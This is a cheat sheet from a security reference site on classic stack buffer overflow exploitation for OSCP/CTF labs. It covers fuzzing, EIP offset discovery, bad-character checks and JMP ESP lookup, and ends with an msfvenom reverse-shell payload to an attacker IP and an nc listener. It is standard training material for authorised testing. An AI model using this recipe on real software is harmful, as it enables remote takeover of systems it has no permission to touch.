CyberCheatsheets

Buffer Overflow Cheat Sheet

Stack-based buffer overflow workflow: fuzz, find the offset, control EIP, find bad chars, locate a JMP ESP, and get a shell.

Exploitation & Payloadsbinary-exploitationbuffer-overflowoscppwnstackUpdated 2026-06-17

Overview

A classic stack-based buffer overflow overwrites the saved return address (EIP) by sending more data than a buffer can hold, redirecting execution to your shellcode. This is the staple OSCP/CTF exploitation pattern. The methodology is mechanical: fuzz to crash, find the exact offset, confirm EIP control, identify bad characters, find a JMP ESP, then place shellcode.

Authorized testing and learning only. Develop and run exploits against software/labs you own or are permitted to test.

1. Fuzz to find the crash

Send increasing buffers until the program crashes

python3 -c "print('A'*100)"

Note the size at which EIP gets overwritten (e.g. ~600)

# Increment by 100-byte steps

2. Find the exact offset

Generate a cyclic De Bruijn pattern

msf-pattern_create -l 600

Look up the EIP value to get the exact offset

msf-pattern_offset -l 600 -q 39694438

pwntools equivalents

cyclic 600   /   cyclic -l 0x39694438

3. Confirm EIP control

EIP should read 42424242 — you now control execution flow

buf = b'A'*offset + b'BBBB' + b'C'*100

4. Find bad characters

Send all chars (minus \x00) after the offset

badchars = bytes(range(1,256))

Immunity/mona: generate reference bytearray

!mona bytearray -b "\x00"

Compare memory to spot mangled/bad chars

!mona compare -f bytearray.bin -a <ESP>

5. Find a JMP ESP

mona: find a JMP ESP address with no bad chars

!mona jmp -r esp -cpb "\x00\x0a"

Static search in a non-ASLR module

objdump -d binary | grep 'jmp.*esp'

Overwrite EIP with the JMP ESP address

buf = b'A'*offset + p32(0x625011af) + nops + shellcode

6. Generate shellcode & exploit

Reverse shell shellcode, bad chars excluded

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f py -b "\x00\x0a"

Final payload: padding + EIP + NOP sled + shellcode

buf = b'A'*offset + p32(jmp_esp) + b'\x90'*16 + shellcode

Catch the shell, then run the exploit

nc -lvnp 443

Tips

  • \x00 (null) is almost always a bad char; \x0a and \x0d are common too — always verify per target.
  • A NOP sled (\x90) before shellcode absorbs small landing-address variance.
  • Pick a JMP ESP from a module without ASLR/DEP and with no bad chars in its address.
  • Use pwntools (cyclic, p32, remote) to script the whole thing once you understand the manual steps.

References

Aide-mémoires similaires